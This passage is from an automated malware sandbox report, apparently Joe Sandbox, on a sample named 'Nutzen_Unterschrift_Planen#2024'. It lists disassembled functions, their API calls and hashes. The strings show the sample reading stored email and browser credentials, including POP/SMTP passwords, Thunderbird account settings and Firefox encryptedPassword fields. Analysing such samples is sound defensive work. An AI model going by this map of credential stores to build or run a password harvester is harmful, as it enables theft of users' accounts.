                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                            Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                            Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: EnumNamesResource
                                                            • String ID:
                                                            • API String ID: 3334572018-0
                                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                            Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                            Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                            Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                            Non-executed Functions

                                                            Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                            • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                            • API String ID: 2238633743-192783356
                                                            • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                            • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                            • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                            • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                            Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                              • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                            • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                            • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$QueryValue$CloseOpen
                                                            • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                            • API String ID: 52435246-1534328989
                                                            • Opcode ID: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                            • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                            • Opcode Fuzzy Hash: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                            • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                            Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 00406E06
                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                            • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                            • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                            • GetLastError.KERNEL32 ref: 00406E74
                                                            • CloseHandle.KERNEL32(?), ref: 00406E80
                                                            • GetLastError.KERNEL32 ref: 00406E8B
                                                            • CloseClipboard.USER32 ref: 00406E94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                            • String ID:
                                                            • API String ID: 3604893535-0
                                                            • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                            • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                            • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                            • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                            Function 00406E9F Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 00406EA7
                                                            • strlen.MSVCRT ref: 00406EB4
                                                            • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                            • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                            • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                            • CloseClipboard.USER32 ref: 00406EFB
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                            • String ID:
                                                            • API String ID: 3116012682-0
                                                            • Opcode ID: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                            • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                            • Opcode Fuzzy Hash: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                            • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                            Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                            • API String ID: 3963849919-1658304561
                                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                            Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID: (yE$(yE$(yE
                                                            • API String ID: 1865533344-362086290
                                                            • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                            • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                            • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                            • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                            Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strlen.MSVCRT ref: 004431AD
                                                            • strncmp.MSVCRT ref: 004431BD
                                                            • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                            • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                            • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                            • API String ID: 1895597112-3210201812
                                                            • Opcode ID: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                            • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                            • Opcode Fuzzy Hash: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                            • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                            Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                            • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                            • API String ID: 1714764973-479759155
                                                            • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                            • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                            • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                            • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                            Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040EBD8
                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                            • memset.MSVCRT ref: 0040EC2B
                                                            • memset.MSVCRT ref: 0040EC47
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                            • memset.MSVCRT ref: 0040ECDD
                                                            • memset.MSVCRT ref: 0040ECF2
                                                            • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                            • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                            • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                            • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                            • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                            • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                            • memset.MSVCRT ref: 0040EDE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                            • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                            • API String ID: 3137614212-1455797042
                                                            • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                            • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                            • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                            • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                            Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                            • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                            • API String ID: 2814039832-2206097438
                                                            • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                            • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                            • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                            • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                            Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                              • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                              • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                              • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                            • memset.MSVCRT ref: 0040E5B8
                                                            • memset.MSVCRT ref: 0040E5CD
                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
